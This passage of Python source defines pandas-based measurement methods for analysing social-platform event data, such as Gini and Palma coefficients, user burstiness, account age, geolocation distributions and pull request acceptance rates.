'value']\n\n measurement = self.getCommunityMeasurementDict(b)\n\n return measurement\n\n\n def propIssueEvent(self,unit='D'):\n \"\"\"\n Calculates the proportion of different issue action types as a function of time.\n Question #8 (Optional Measurement)\n Inputs: communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n unit - Temporal granularity for calculating the time series (e.g. D - day, H - hour, etc.)\n Output: Dictionary of data frames for each community\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if self.main_df_opt is not None:\n\n df = df[ (df['event'] == 'IssuesEvent') ]\n\n if len(df) == 0:\n return(None)\n\n #round times down to nearest unit\n df = df.assign(time=df.time.dt.floor(unit))\n\n #merge optional columns (action, merged) with primary data frame\n df = df.merge(self.main_df_opt,how='left',left_index=True,right_index=True)\n\n df = df[(df['action'].isin(['opened','closed','reopened']))]\n\n if len(df) == 0:\n return(None)\n\n df = df[['action','event','time','community']].groupby(['time','action','community']).count() #time,action,count\n df = df.reset_index()\n\n p = df\n p.columns = ['time','action', 'community','counts']\n\n #create one column for each action type holding the counts of that action type\n p = pd.pivot_table(p,index=['time','community'],columns='action', values='counts').fillna(0)\n p = p.reset_index()\n p = pd.melt(p, id_vars=['time','community'], value_vars=['closed', 'opened', 'reopened'])\n p.columns = ['time','community','action', 'value']\n\n measurement = self.getCommunityMeasurementDict(p)\n\n return measurement\n else:\n return None\n\n\n def ageOfAccounts(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n Calculates the distribution of user account ages for users who are active in the data.\n Question #10\n Inputs: df - Events data\n eventTypes - List of event types to include in the data\n Output: A pandas Series containing account age of the user for each action taken in the community\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if self.useUserMetaData:\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n\n df = df.merge(self.created_at_df, left_on='user', right_on='user', how='inner')\n df = df.sort_values(['time'])\n\n #get user account age at the time of each event\n df['age'] = df['time'].sub(df['created_at'], axis=0)\n df['age'] = df['age'].astype('timedelta64[D]')\n\n df = df.rename(index=str, columns={community_field: \"community\"})\n df.set_index('community')\n\n measurement = self.getCommunityMeasurementDict(df['age'])\n\n return df['age']\n else:\n warnings.warn('Skipping ageOfAccountsHelper because metadata file is required')\n return None\n\n\n def userGeoLocation(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n A function to calculate the distribution of user geolocations for users active in each community\n Question #21\n Inputs: df - Events data frame\n eventTypes - List of event types to include in the data\n Output: Data frame with the location distribution of activity in the data\n \"\"\"\n df = self.communityDF.copy()\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n if self.useUserMetaData:\n\n #merge events data with user location metadata\n merge = df.merge(self.locations_df, left_on='user', right_on='user', how='inner')\n merge = merge[['user','country',community_field]].groupby([community_field,'country']).count().reset_index()\n merge.columns = ['community','country','value']\n\n community_totals = merge.groupby(community_field)['value'].sum().reset_index()\n community_totals.columns = ['community','total']\n merge = merge.merge(community_totals,on='community',how='left')\n merge['value'] = merge['value']/merge['total']\n\n print('merge',merge)\n\n #set rare locations to \"other\"\n thresh = 0.007\n merge['country'][merge['value'] < thresh] = 'other'\n\n #sum over other countries\n grouped = merge.groupby([community_field,'country']).sum().reset_index()\n\n print('grouped',grouped)\n\n measurement = self.getCommunityMeasurementDict(grouped)\n\n return measurement\n else:\n warnings.warn('Skipping userGeoLocationHelper because metadata file is required')\n return {}\n\n\n def getUserBurstByCommunity(self,eventTypes=None,thresh=5.0,community_field=\"subreddit\"):\n \"\"\"\n Calculate the distribution of user inter-event time burstiness in the data set.\n Question #9\n Inputs: df - Events data frame\n eventTypes - List of event types to include in the data\n thresh - Minimum number of events for a user to be included\n Output: Data frame of user burstiness values\n \"\"\"\n df = self.communityDF.copy()\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n #only calculate burstiness for users which have sufficient activity\n users = df.groupby(['user',community_field])\n user_counts = users['event'].count().reset_index()\n user_list = user_counts[user_counts['event'] >= thresh]\n user_list.columns = ['user',community_field,'total_activity']\n\n if len(user_list) == 0:\n return None\n\n df = df.merge(user_list,how='inner',on=['user',community_field])\n\n def user_burstiness(grp):\n #get interevent times for each user seperately\n if len(grp['user'].unique()) > 1:\n grp = grp.groupby('user').apply(lambda grp: (grp.time - grp.time.shift()).fillna(0)).reset_index()\n else:\n grp['time'] = grp['time'] - grp['time'].shift().dropna()\n\n grp['value'] = grp['time'] / np.timedelta64(1, 's')\n\n #calculate burstiness using mean and standard deviation of interevent times\n grp = grp.groupby('user').agg({'value':{'std':np.std,'mean':np.mean}})\n\n grp.columns = grp.columns.get_level_values(1)\n grp['value'] = (grp['std'] - grp['mean']) / (grp['std'] + grp['mean'])\n\n grp = grp[['value']].dropna().reset_index()\n\n return grp\n\n b = df.groupby(community_field).apply(user_burstiness).reset_index()[[community_field,'value']].set_index(community_field)['value']\n\n measurement = self.getCommunityMeasurementDict(b)\n\n return measurement\n\n\n def getCommunityGini(self,communities=True,eventTypes=None,community_field=\"subreddit\",content_field=\"root\"):\n \"\"\"\n Wrapper function calculate the gini coefficient for the data frame.\n Question #6\n Input: communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n eventTypes - A list of event types to include in the calculation\n Output: A dictionary of gini coefficients for each community\n \"\"\"\n if len(self.communityDF) > 0:\n ginis = self.communityDF.groupby(community_field).apply(lambda x: self.getGiniCoefHelper(x,content_field))\n\n measurement = self.getCommunityMeasurementDict(ginis)\n\n return measurement\n else:\n return None\n\n\n def getCommunityPalma(self,communities=True,eventTypes=None,community_field=\"subreddit\",content_field=\"root\"):\n \"\"\"\n Wrapper function calculate the Palma coefficient for the data frame.\n Question #6\n Input: communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n eventTypes - A list of event types to include in the calculation\n Output: A dictionary of Palma coefficients for each community\n \"\"\"\n if len(self.communityDF) > 0:\n\n palmas = self.communityDF.groupby(community_field).apply(lambda x: self.getPalmaCoefHelper(x,content_field))\n\n measurement = self.getCommunityMeasurementDict(palmas)\n\n return measurement\n\n else:\n return None\n\n\n def getNodeDictionary(self,df):\n meas = {}\n for content in df.content.unique():\n meas[content] = df[df.content == content]\n del meas[content][\"content\"]\n\n return meas\n\n\n def getSelectContentIds(self, content_ids):\n \"\"\"\n This function creates a dictionary of data frames with\n each entry being the activity of one piece of content from the content_ids\n argument.\n\n This is used for the selected content ids for the node-level meausurements.\n Inputs: content_ids - List of content ids (e.g. GitHub - full_name_h, etc.)\n Output: Dictionary of data frames with the content ids as the keys\n \"\"\"\n contentDic = {}\n for ele in content_ids:\n d = self.main_df[self.main_df['content'] == ele]\n contentDic[ele] = d\n\n return contentDic\n\n\n def runSelectContentIds(self, method, *args):\n \"\"\"\n This function runs a particular measurement (method) on the\n content ids that were selected by getSelectContentIds.\n\n This is used for the selected content IDs for the node-level meausurements.\n\n Inputs: method - Measurement function\n Output: Dictionary of measurement results with the content ids as the keys\n \"\"\"\n ans = {}\n for ele in self.selectedContent.keys():\n df = self.selectedContent[ele].copy()\n ans[ele] = method(df,*args)\n\n return ans\n\n\n def getContentDiffusionDelay(self, eventTypes=None, selectedContent=True, time_bin='m',content_field='root'):\n \"\"\"\n This method returns the distributon for the diffusion delay for each content node.\n Question #1\n Inputs: DataFrame - Data\n eventTypes - A list of events to filter data on\n selectedContent - A boolean indicating whether to run on selected content nodes\n time_bin - Time unit for time differences, e.g. \"s\",\"d\",\"h\"\n Output: An dictionary with a data frame for each content ID containing the diffusion delay values in the given units\n \"\"\"\n df = self.selectedContent.copy()\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df.index) == 0:\n return {}\n\n #use metadata for content creation dates if available\n if self.useContentMetaData:\n df = df.merge(self.contentMetaData,left_on=content_field,right_on=content_field,how='left')\n df = df[[content_field,'created_at','time']].dropna()\n df['value'] = (df['time']-df['created_at']).apply(lambda x: int(x / np.timedelta64(1, time_bin)))\n #otherwise use first observed activity as a proxy\n else:\n creation_day = df.groupby(content_field)['time'].min().reset_index()\n creation_day.columns = [content_field,'creation_date']\n df = df.merge(creation_day, on=content_field, how='left')\n df['value'] = (df['time']-df['creation_date']).apply(lambda x: int(x / np.timedelta64(1, time_bin)))\n df = df[[content_field,'value']]\n df.columns = ['content','value']\n df = df.iloc[1:]\n\n measurements = self.getNodeDictionary(df)\n\n return measurements\n\n\n def getContentGrowth(self, eventTypes=None, cumSum=False, time_bin='D', content_field='root'):\n \"\"\"\n This method returns the growth of a repo over time.\n Question #2\n Input: eventTypes - A list of events to filter data on\n cumSum - This is a boolean that indicates if the dataframe should be cumuluative over time.\n time_bin - The temporal granularity of the output time series\n output - A dictionary with a dataframe for each content id that describes the content activity growth.\n \"\"\"\n df = self.selectedContent\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n\n df = df.set_index(\"time\")\n\n measurement = df[[content_field,'event']].groupby([content_field,pd.Grouper(freq=time_bin)]).count()\n measurement.columns = ['value']\n\n if cumSum == True:\n measurement['value'] = measurement.cumsum(axis=0)['value']\n measurement = measurement.reset_index()\n measurement.columns = ['content','time','value']\n\n measurements = self.getNodeDictionary(measurement)\n\n return measurements\n\n\n def getContributions(self, new_users_flag=False, cumulative=False, eventTypes=None, time_bin='H', content_field=\"root\"):\n \"\"\"\n Calculates the total number of unique daily contributers to a repo or the unique daily contributors who are new contributors\n Question # 4\n Input: newUsersOnly - Boolean to indicate whether to calculate total daily unique users (False) or daily new contributers (True),\n if None run both total and new unique users.\n cumulative - Boolean to indicate whether or not the metric should be cumulative over time\n eventTypes - A list of event types to include in the calculation\n time_bin - Granularity of time series\n Output: A data frame with daily event counts\n \"\"\"\n df = self.selectedContent.copy()\n\n def contributionsInsideHelper(dfH,newUsersOnly,cumulative):\n if newUsersOnly:\n #drop duplicates on user so a new user only shows up once in the data\n dfH = dfH.drop_duplicates(subset=['user'])\n\n p = dfH[[content_field,'user']].groupby([content_field,pd.Grouper(freq=time_bin)])['user'].nunique().reset_index()\n\n if cumulative:\n #get cumulative user counts\n p['user'] = p.groupby(content_field)['user'].transform(pd.Series.cumsum)\n\n p.columns = ['content','time','value']\n return p\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n df = df.set_index(\"time\")\n\n if not new_users_flag:\n #run total daily user counts\n results = contributionsInsideHelper(df,False, cumulative)\n else:\n #run unique daily user counts\n results = contributionsInsideHelper(df,newUsersOnly, cumulative)\n\n meas = self.getNodeDictionary(results)\n\n return meas\n\n\n def getDistributionOfEvents(self,weekday=False,content_field=\"root\"):\n \"\"\"\n This method returns the distribution for each event over time or by weekday. Default is over time.\n Question #5\n Inputs: weekday - (Optional) Boolean to indicate whether the distribution should be done by weekday. Default is False.\n Output: Dataframe with the distribution of events by weekday. Columns: Event, Weekday, Count or Event, Date, Count\n \"\"\"\n df = self.selectedContent.copy()\n\n df['id'] = df.index\n df['weekday'] = df['time'].dt.weekday_name\n df['date'] = df['time'].dt.date\n\n if weekday:\n col = 'weekday'\n else:\n col = 'date'\n\n counts = df.groupby([content_field,'event',col])['user'].count().reset_index()\n counts.columns = ['content','event',col,'value']\n\n meas = self.getNodeDictionary(counts)\n\n return meas\n\n\n def processDistOfEvents(self,df,weekday):\n \"\"\"\n Helper Function for getting the Dist. of Events per weekday.\n \"\"\"\n df.set_index('time', inplace=True)\n df['hour'] = df.index.hour\n df['day'] = df.index.day\n df['month'] = df.index.month\n df['year'] = df.index.year\n\n if weekday:\n df['weekday'] = df.apply(lambda x:datetime(x['year'],x['month'],x['day']).weekday(),axis=1)\n p = df[['event','user','weekday']].groupby(['event','weekday']).count()\n p = p.reset_index()\n return p\n\n else:\n p = df[['event', 'year', 'month', 'day','id']].groupby(['event', 'year', 'month','day']).count()\n p = pd.DataFrame(p).reset_index()\n p.column = ['event', 'year', 'month','day','count']\n p['date'] = p.apply(lambda x: datetime.strptime(\"{0} {1} {2}\".format(x['year'], x['month'],x['day']), \"%Y %m %d\"), axis=1)\n p['date'] = p['date'].dt.strftime('%Y-%m-%d')\n p = p.reset_index()\n return p\n\n\n @check_empty(default=None)\n def getGiniCoef(self,nodeType='root', eventTypes=None, \n content_field=\"root\"):\n \"\"\"\n Wrapper function calculate the gini coefficient for the data frame.\n Question #6,14,26\n Input: df - Data frame containing data can be any subset of data\n nodeType - Type of node to calculate the Gini coefficient over. Options: user or repo (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: g - gini coefficient\n \"\"\"\n result = self.getGiniCoefHelper(self.main_df, nodeType, eventTypes, content_field)\n\n return result\n\n\n def getGiniCoefHelper(self, df, nodeType, eventTypes=None, \n content_field=\"root\"):\n \"\"\"\n This method returns the gini coefficient for the data frame.\n Question #6,14,26\n Input: df - Data frame containing data can be any subset of data\n nodeType - Type of node to calculate the Gini coefficient over. Options: user or repo (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: g - gini coefficient\n \"\"\"\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n #count events for given node type\n if nodeType != 'user':\n df = df[[nodeType, 'user']].groupby(nodeType).count()\n else:\n df = df[[nodeType, content_field]].groupby(nodeType).count()\n\n df.columns = ['value']\n df = df.reset_index()\n\n values = df['value'].values.astype(float)\n\n if np.amin(values) < 0:\n values -= np.amin(values)\n\n values += 1e-9\n\n values = np.sort(np.array(values))\n\n index = np.arange(1,values.shape[0]+1)\n n = values.shape[0]\n g = ((np.sum((2 * index - n - 1) * values)) / (n * np.sum(values)))\n\n return g\n\n\n def getPalmaCoef(self,nodeType='root', eventTypes=None, content_field=\"root\"):\n \"\"\"\n Wrapper function calculate the Palma coefficient for the data frame.\n Question #6,14,26\n Input: df - Data frame containing data can be any subset of data\n nodeType - Type of node to calculate the Palma coefficient over. Options: user or repo (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: Palma coefficient\n \"\"\"\n result = self.getPalmaCoefHelper(self.main_df, nodeType,eventTypes,content_field)\n\n return result\n\n @check_empty(default=None)\n def getPalmaCoefHelper(self, df, nodeType='root', eventTypes=None, content_field = \"root\"):\n \"\"\"\n This method returns the Palma coefficient.\n Question #6,14,26\n Input: df - Data frame containing data can be any subset of data\n nodeType - (Optional) This is the node type on whose event counts the Palma coefficient\n is calculated. Options: user or content (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: p - Palma Coefficient\n \"\"\"\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n if nodeType != 'user':\n df = df[[nodeType, 'user']].groupby(nodeType).count()\n else:\n df = df[[nodeType, content_field]].groupby(nodeType).count()\n\n df.columns = ['value']\n df = df.reset_index()\n\n values = df['value'].values\n values = np.sort(np.array(values))\n percent_nodes = np.arange(1, len(values) + 1) / float(len(values))\n\n #percent of events taken by top 10% of nodes\n p10 = np.sum(values[percent_nodes >= 0.9])\n #percent of events taken by bottom 40% of nodes\n p40 = np.sum(values[percent_nodes <= 0.4])\n\n try:\n p = float(p10) / float(p40)\n except ZeroDivisionError:\n return None\n\n return p\n\n\n def getTopKContent(self,content_field='root',k=100,eventTypes=None):\n \"\"\"\n This method returns the top-k pieces of content by event count for selected event types\n Question #12,13\n Inputs: eventTypes - A list of event types to include in the calculation\n content_field - Options: root, parent, or content.\n k - Number of entities to return\n Outputs: Dataframe with the top-k content ids and their event counts. Columns are content id and the count of that event.\n \"\"\"\n df = self.main_df.copy()\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n p = df[[content_field, 'event']].groupby([content_field]).count()\n p = p.sort_values(by='event',ascending=False)\n p.columns = ['value']\n\n return p.head(k)\n\n\n def getDistributionOfEventsByContent(self, content_field='root', eventTypes=['WatchEvent']):\n \"\"\"\n This method returns the distribution of event type per content e.g. x repos/posts/tweets with y number of events,\n z repos/posts/ with n amounts of events.\n Question #11,12,13\n Inputs: eventTypes - List of event type(s) to get distribution over\n Outputs: Dataframe with the distribution of event type per repo. Columns are repo id and the count of that event.\n \"\"\"\n df = self.main_df.copy()\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n p = df[[content_field,'time']].groupby(content_field).count()\n p = p.sort_values(by='time')\n p.columns = ['value']\n p = p.reset_index()\n return p\n\n\n def getRepoPullRequestAcceptance(self,eventTypes=['PullRequestEvent'],thresh=2):\n \"\"\"\n Calculate the proportion of pull requests that are accepted for each repo.\n Question #15 (Optional Measurement)\n Inputs: eventTypes: List of event types to include in the calculation (Should be PullRequestEvent).\n thresh: Minimum number of PullRequests a repo must have to be included in the distribution.\n Output: Data frame with the proportion of accepted pull requests for each repo\n \"\"\"\n #check if optional columns exist\n if not self.main_df_opt is None and 'PullRequestEvent' in self.main_df.event.values:\n\n df = self.main_df_opt.copy()\n\n idx = (self.main_df.event.isin(eventTypes)) & (df.merged.isin([True,False,\"True\",\"False\"]))\n\n df = df[idx]\n users_repos = self.main_df[idx]\n\n df['merged'] = df['merged'].map({\"True\":True,\"False\":False})\n\n if len(df) == 0:\n return None\n\n #subset to only pull requests which are being closed (not opened)\n idx = df['action'] == 'closed'\n closes = df[idx]\n users_repos = users_repos[idx]\n\n #merge optional columns (action, merged) with the main data frame columns\n closes = pd.concat([users_repos,closes],axis=1)\n closes = closes[['content','merged']]\n closes['value'] = 1\n\n #create count of accepted (merged) and rejected pull requests by repo\n outcomes = closes.pivot_table(index=['content'],values=['value'],columns=['merged'],aggfunc='sum').fillna(0)\n\n outcomes.columns = outcomes.columns.get_level_values(1)\n\n outcomes = outcomes.rename(index=str, columns={True: \"accepted\", False: \"rejected\"})\n\n #if only accepted or reject observed in data, create other column and fill with zero\n for col in ['accepted','rejected']:\n if col not in outcomes.columns:\n outcomes[col] = 0\n\n #get total number of pull requests per repo by summing accepted and rejected\n outcomes['total'] = outcomes['accepted'] + outcomes['rejected']\n #get proportion\n outcomes['value'] = outcomes['accepted'] / outcomes['total']\n\n #subset on content which have enough data\n outcomes = outcomes[outcomes['total'] >= thresh]\n\n if len(outcomes.index) > 0:\n measurement = outcomes.reset_index()[['content','value']]\n else:\n measurement = None\n else:\n measurement = None\n\n return measurement\n\n\n def getEventTypeRatioTimeline(self, eventTypes=None, event1='IssuesEvent', event2='PushEvent', content_field=\"root\"):\n if self.platform!='reddit':\n df = self.selectedContent.copy()\n else:\n df = self.main_df.copy()\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n df['value'] = 1\n\n if len(df.index) < 1:\n return {}\n\n grouped = df.groupby([content_field, 'user'])\n\n if len(grouped) > 1:\n measurement = grouped.apply(lambda x: x.value.cumsum()).reset_index()\n measurement['event'] = df['event'].reset_index(drop=True)\n else:\n measurement = df.copy()\n measurement['value'] = df['value'].cumsum()\n measurement['event'] = df['event']\n\n measurement = measurement[measurement['event'].isin([event1,event2])]\n\n measurement[event1] = measurement['event'] == event1\n measurement[event2] = measurement['event'] == event2\n\n measurement['next_event_' + event1] = measurement[event1].shift(-1)\n measurement['next_event_' + event2 ] = measurement[event2].shift(-1)\n\n bins = np.logspace(-1,3.0,16)\n measurement['num_events_binned'] = pd.cut(measurement['value'],bins).apply(lambda x: np.floor(x.right)).astype(float)\n\n def ratio(grp):\n if float(grp['next_event_' + event2].sum()) > 0:\n return float(grp['next_event_' + event1].sum()) / float(grp['next_event_' + event2].sum())\n else:\n return 0.0\n\n if len(measurement.index) > 0:\n measurement = measurement.groupby([content_field,'num_events_binned']).apply(ratio).reset_index()\n measurement.columns = ['content','num_events_binned','value']\n else:\n measurement = None\n\n measurement = self.getNodeDictionary(measurement)\n\n return measurement\n\n\n def propUserContinue(self,eventTypes=None,content_field=\"root\"):\n if self.platform != 'reddit':\n df = self.selectedContent.copy()\n else:\n df = self.main_df.copy()\n\n if not eventTypes is None:\n data = df[df['event'].isin(eventTypes)]\n\n if len(data.index) > 1:\n data['value'] = 1\n grouped = data.groupby(['user',content_field])\n\n #get running count of user actions on each piece of content\n if grouped.ngroups > 1:\n measurement = grouped.apply(lambda grp: grp.value.cumsum()).reset_index()\n else:\n data['value'] = data['value'].cumsum()\n measurement = data.copy()\n\n #get total number of user actions on each piece of content\n grouped = measurement.groupby(['user',content_field]).value.max().reset_index()\n grouped.columns = ['user',content_field,'num_events']\n\n measurement = measurement.merge(grouped,on=['user',content_field])\n\n #boolean indicator of whether a given event is the last one by the user\n measurement['last_event'] = measurement['value'] == measurement['num_events']\n\n #bin by the number of previous events\n bins = np.logspace(-1,2.5,30)\n measurement['num_actions'] = pd.cut(measurement['value'],bins).apply(lambda x: np.floor(x.right)).astype(float)\n measurement['last_event'] = ~measurement['last_event']\n\n #get percentage of events within bin that are NOT the last event for a user\n measurement = measurement.groupby([content_field,'num_actions']).last_event.mean().reset_index()\n measurement.columns = ['content','num_actions','value']\n measurement = self.getNodeDictionary(measurement)\n\n else:\n measurement = {}\n\n return measurement\n\n\n def determineDf(self, users, eventTypes):\n \"\"\"\n This function selects a subset of the full data set for a selected set of users and event types.\n Inputs: users - A boolean or a list of users. If it is list of user ids (login_h) the data frame is subset on only this list of users.\n If it is True, then the pre-selected node-level subset is used. If False, then all users are included.\n eventTypes - A list of event types to include in the data set\n\n Output: A data frame with only the selected users and event types.\n \"\"\"\n if users==True:\n df = self.selectedUsers\n elif type(users) is list:\n df = df[df.user.isin(users)]\n else:\n df = self.main_df\n\n if eventTypes!=None:\n df = df[df.event.isin(eventTypes)]\n\n return df\n\n\n def getUserUniqueContent(self, selectedUsers=False, eventTypes=None, content_field=\"root\"):\n \"\"\"\n This method returns the number of unique repos that a particular set of users contributed too\n Question #17\n Inputs: selectedUsers - A list of users of interest or a boolean indicating whether to subset to the node-level measurement users.\n eventTypes - A list of event types to include in the data\n content_field - CSV column which contains the content ID (e.g. nodeID, parentID, or rootID)\n Output: A dataframe with the user id and the number of repos contributed to\n \"\"\"\n df = self.determineDf(selectedUsers, eventTypes)\n df = df.groupby('user')\n data = df[content_field].nunique().reset_index()\n data.columns = ['user','value']\n return data\n\n\n def getUserActivityTimeline(self, selectedUsers=True,time_bin='1d',cumSum=False,eventTypes=None):\n \"\"\"\n This method returns the timeline of activity of the desired user over time, either in raw or cumulative counts.\n Question #19\n Inputs: selectedUsers - A list of users of interest or a boolean indicating whether to subset to node-level measurement users.\n time_bin - Time frequency for calculating event counts\n cumSum - Boolean indicating whether to calculate the cumulative activity counts\n eventTypes = List of event types to include in the data\n Output: A dictionary with a data frame for each user with two columns: data and event counts\n \"\"\"\n df = self.determineDf(selectedUsers,eventTypes)\n\n df['value'] = 1\n if cumSum:\n df['cumsum'] = df.groupby('user').value.transform(pd.Series.cumsum)\n df = df.groupby(['user',pd.Grouper(key='time',freq=time_bin)]).max().reset_index()\n df['value'] = df['cumsum']\n df = df.drop('cumsum',axis=1)\n else:\n df = df.groupby(['user',pd.Grouper(key='time',freq=time_bin)]).sum().reset_index()\n\n data = df.sort_values(['user', 'time'])\n\n measurements = {}\n for user in data['user'].unique():\n user_df = data[data['user'] == user]\n idx = pd.date_range(min(user_df.time), max(user_df.time))\n user_df = user_df.set_index('time')\n user_df = user_df.reindex(idx)\n user_df.index.names = ['time']\n user_df['user'].ffill(inplace=True)\n user_df['value'].fillna(0,inplace=True)\n\n measurements[user] = user_df.reset_index()\n del measurements[user]['user']\n\n return measurements\n\n\n def getUserPopularity(self, k=5000, use_metadata=False, eventTypes=None, content_field='root'):\n \"\"\"\n This method returns the top k most popular users for the dataset, where popularity is measured\n as the total popularity of the repos created by the user.\n Question #25\n Inputs: k - (Optional) The number of users that you would like returned.\n use_metadata - External metadata file containing repo owners. Otherwise use first observed user with\n a creation event as a proxy for the repo owner.\n eventTypes - A list of event types to include\n Output: A dataframe with the user ids and number events for that user\n \"\"\"\n df = self.determineDf(False,eventTypes)\n\n df['value'] = 1\n\n content_popularity = df.groupby(content_field)['value'].sum().reset_index()\n\n creation_event = ''\n if 'CreateEvent' in df.event.unique():\n creation_event = 'CreateEvent'\n elif 'post' in df.event.unique():\n creation_event = 'post'\n elif 'tweet' in df.event.unique():\n creation_event = 'tweet'\n\n if use_metadata:\n #merge content popularity with the owner information in content_metadata\n #drop data for which no owner information exists in metadata\n merged = content_popularity.merge(self.repoMetaData,left_on=content_field,right_on='full_name_h',\n how='left').dropna()\n elif df[content_field].str.match('.{22}/.{22}').all():\n #if all content IDs have the correct format use the owner info from the content id\n content_popularity['owner_id'] = content_popularity[content_field].apply(lambda x: x.split('/')[0])\n elif creation_event != '':\n #otherwise use creation event as a proxy for ownership\n user_content = df[df['event'] == creation_event].sort_values('time').drop_duplicates(subset=content_field,keep='first')\n user_content = user_content[['user',content_field]]\n user_content.columns = ['owner_id', content_field]\n if len(user_content.index) >= 0:\n content_popularity = user_content.merge(content_popularity,on=content_field,how='left')\n else:\n return None\n else:\n return None\n\n measurement = content_popularity.groupby('owner_id').value.sum().sort_values(ascending=False).head(k)\n measurement = pd.DataFrame(measurement).sort_values('value',ascending=False).reset_index()\n\n return measurement\n\n\n def getAvgTimebwEventsUsers(self, selectedUsers=True, nCPU=1):\n \"\"\"\n This method returns the average time between events for each user\n\n Inputs: df - Data frame of all data for repos\n users - (Optional) List of specific users to calculate the metric for\n nCPu - (Optional) Number of CPU's to run metric in parallel\n Outputs: A list of average times for each user. Length should match number of repos\n \"\"\"\n df = self.determineDf(selectedUsers)\n users = self.df['user'].unique()\n args = [(df, users[i]) for i, item_a in enumerate(users)]\n pool = pp.ProcessPool(nCPU)\n deltas = pool.map(self.getMeanTimeHelper, args)\n\n return deltas\n\n\n def getMeanTimeUser(self,df, user):\n \"\"\"\n Helper function for getting the average time between events\n\n Inputs: Same as average time between events\n Output: Same as average time between events\n \"\"\"\n d = df[df.user == user]\n d = d.sort_values(by='time')\n delta = np.mean(np.diff(d.time)) / np.timedelta64(1, 's')\n return delta\n\n\n def getMeanTimeUserHelper(self, args):\n\n return self.getMeanTimeUser(*args)\n\n\n def getUserDiffusionDelay(self,unit='h', selectedUser=True,eventTypes=None):\n \"\"\"\n This method returns distribution the diffusion delay for each user\n Question #27\n Inputs: DataFrame - Desired dataset\n unit - (Optional) This is the unit that you want the distribution in. Check np.timedelta64 documentation\n for the possible options\n metadata_file - File containing user account creation times. Otherwise use first observed action of user as proxy for account creation time.\n Output: A list (array) of deltas in units specified\n \"\"\"\n df = self.determineDf(selectedUser,eventTypes)\n\n df['value'] = df['time']\n df['value'] = pd.to_datetime(df['value'])\n df['value'] = df['value'].dt.round('1H')\n\n if self.useUserMetaData:\n df = df.merge(self.UserMetaData[['user','created_at']],left_on='user',right_on='user',how='left')\n df = df[['user','created_at','value']].dropna()\n measurement = df['value'].sub(df['created_at']).apply(lambda x: int(x / np.timedelta64(1, unit)))\n else:\n grouped = df.groupby('user')\n transformed = grouped['value'].transform('min')\n measurement = df['value'].sub(transformed).apply(lambda x: int(x / np.timedelta64(1, unit)))\n return measurement\n\n\n def getMostActiveUsers(self,k=5000,eventTypes=None):\n \"\"\"\n This method returns the top k users with the most events.\n Question #24b\n Inputs: DataFrame - Desired dataset. Used mainly when dealing with subset of events\n k - Number of users to be returned\n Output: Dataframe with the user ids and number of events\n \"\"\"\n df = self.main_df\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n df['value'] = 1\n df = df.groupby('user')\n measurement = df.value.sum().sort_values(ascending=False).head(k)\n measurement = pd.DataFrame(measurement).sort_values('value',ascending=False).reset_index()\n return measurement\n\n\n def getUserActivityDistribution(self,eventTypes=None,selectedUser=False):\n \"\"\"\n This method returns the distribution for the users activity (event counts).\n Question #24a\n Inputs: DataFrame - Desired dataset\n eventTypes - (Optional) Desired event type to use\n Output: List containing the event counts per user\n \"\"\"\n if selectedUser:\n df = self.selectedUsers\n else:\n df = self.main_df\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n df['value'] = 1\n df = df.groupby('user')\n measurement = df.value.sum().reset_index()\n\n return measurement\n\n\n def getUserPullRequestAcceptance(self,eventTypes=['PullRequestEvent'], thresh=2):\n \"\"\"\n Calculate the proportion of pull requests that are accepted by each user.\n Question #15 (Optional Measurement)\n Inputs: eventTypes: List of event types to include in the calculation (Should be PullRequestEvent).\n thresh: Minimum number of PullRequests a repo must have to be included in the distribution.\n Output: Data frame with the proportion of accepted pull requests for each user\n \"\"\"\n if not self.main_df_opt is None and 'PullRequestEvent' in self.main_df.event.values:\n df = self.main_df_opt.copy()\n\n idx = (self.main_df.event.isin(eventTypes)) & (df.merged.isin([True,False,\"True\",\"False\"]))\n df = df[idx]\n\n df['merged'] = df['merged'].map({\"False\":False,\"True\":True})\n users_repos = self.main_df[idx]\n\n if len(df) == 0:\n return None\n\n #subset on only PullRequest close actions (not opens)\n idx = df['action'] == 'closed'\n closes = df[idx]\n users_repos = users_repos[idx]\n\n #merge pull request columns (action, merged) with main data frame columns\n closes = pd.concat([users_repos,closes],axis=1)\n closes = closes[['user','content','merged']]\n closes['value'] = 1\n\n #add up number of accepted (merged) and rejected pullrequests by user and repo\n outcomes = closes.pivot_table(index=['user','content'],values=['value'],columns=['merged'],aggfunc=np.sum).fillna(0)\n\n outcomes.columns = outcomes.columns.get_level_values(1)\n\n outcomes = outcomes.rename(index=str, columns={True: \"accepted\", False: \"rejected\"})\n\n for col in ['accepted','rejected']:\n if col not in outcomes.columns:\n outcomes[col] = 0\n\n outcomes['total'] = outcomes['accepted'] + outcomes['rejected']\n outcomes['value'] = outcomes['accepted'] / outcomes['total']\n outcomes = outcomes.reset_index()\n outcomes = outcomes[outcomes['total'] >= thresh]\n\n if len(outcomes.index) > 0:\n #calculate the average acceptance rate for each user across their repos\n measurement = 